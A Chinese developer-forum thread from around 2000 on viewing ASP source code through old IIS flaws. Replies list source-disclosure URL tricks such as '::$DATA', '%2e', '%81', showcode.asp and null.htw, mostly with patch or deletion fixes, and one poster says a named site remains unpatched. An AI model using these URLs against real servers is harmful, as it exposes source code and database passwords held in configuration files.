28,391
社区成员
发帖
与我相关
我的任务
分享查看asp源代码
我在一本书上看到说ASP的安全性很差,后面加个::$DATA就可以看到源代码了。我试了一下,在地址后加上了?::$DATA,可是没什么效果。请问这里有没有人知道这个参数怎么用?多谢。
...全文
请发表友善的回复…
发表回复
april_d 2001-11-19
- 打赏
- 举报
try
堆堆 2000-07-26
- 打赏
- 举报
null.htw和idq有什么漏洞?
Cobra 2000-07-26
- 打赏
- 举报
可以试试下面的7种方法
1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp 解决方案:删除showcode.asp
2、http://somewhere/something.asp::$DATA 解决方案: 装sp3
3、http://somewhere/something.asp%2e 解决方案: 装sp4
或者 http://somewhere/something.asp.(加一个点) 解决方案: 装sp4
4、 http://somewhere/something%2e%41sp
或者L http://somewhere/something%2e%asp 解决方案: 装sp4
5、http://somewhere/something.asp%81 解决方案:装sp6或者打补丁
6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp
7.http://somewhere/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
最大的危害莫过于asa文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;
1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp 解决方案:删除showcode.asp
2、http://somewhere/something.asp::$DATA 解决方案: 装sp3
3、http://somewhere/something.asp%2e 解决方案: 装sp4
或者 http://somewhere/something.asp.(加一个点) 解决方案: 装sp4
4、 http://somewhere/something%2e%41sp
或者L http://somewhere/something%2e%asp 解决方案: 装sp4
5、http://somewhere/something.asp%81 解决方案:装sp6或者打补丁
6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp
7.http://somewhere/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
最大的危害莫过于asa文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;
yagami 2000-07-26
- 打赏
- 举报
null.htw能得到ASP代码.idq能得到网站的目录结构.
netsong 2000-07-24
- 打赏
- 举报
装上了sp6就修正了这个bug。
有时对于sp4,用::$DATA查看时白屏,可查看原文件获得asp源程序
有时对于sp4,用::$DATA查看时白屏,可查看原文件获得asp源程序
Tyro 2000-07-24
- 打赏
- 举报
这个办法已经过时了,只有很少的网站能够用这个办法看到源码,大部分网站已经补上了这个漏洞
Focus_zhao 2000-07-24
- 打赏
- 举报
没明白,请具体讲讲,用了那个参数之后再做什末才能看到代码?
yagami 2000-07-24
- 打赏
- 举报
null.htw呢?
www.csdn.net也不过是前不久才打的补丁.外面没有打补丁的站多了.Service Pack又不是万能的.
还有idq漏洞.这个洞expert.csdn.net也没有补.一样可以拿到源代码的.我才没空搞破坏了.不过请csdn站长注意了!
www.csdn.net也不过是前不久才打的补丁.外面没有打补丁的站多了.Service Pack又不是万能的.
还有idq漏洞.这个洞expert.csdn.net也没有补.一样可以拿到源代码的.我才没空搞破坏了.不过请csdn站长注意了!
yagami 2000-07-24
- 打赏
- 举报
::$DATA已是很老的一种.还有:
%81
%2e
%2e%41sp
code.asp
showcode.asp
null.htw
longhtr
some.asp.bak
dvwssr.dll
具体的你去看<<高手们、黑客们、难题!!!(2)>>这帖好了.
%81
%2e
%2e%41sp
code.asp
showcode.asp
null.htw
longhtr
some.asp.bak
dvwssr.dll
具体的你去看<<高手们、黑客们、难题!!!(2)>>这帖好了.
siva 2000-07-23
- 打赏
- 举报
csdn有相关文章,找找去吧
mjs2000 2000-07-23
- 打赏
- 举报
IIS是一个问题,如果你的IIS版本低只要你装了Sp5或Sp6都不会让你用::$DATA查看原代码。
dark 2000-07-23
- 打赏
- 举报
看你用的IIS是什么版本了,微软已修正了这个BUG了
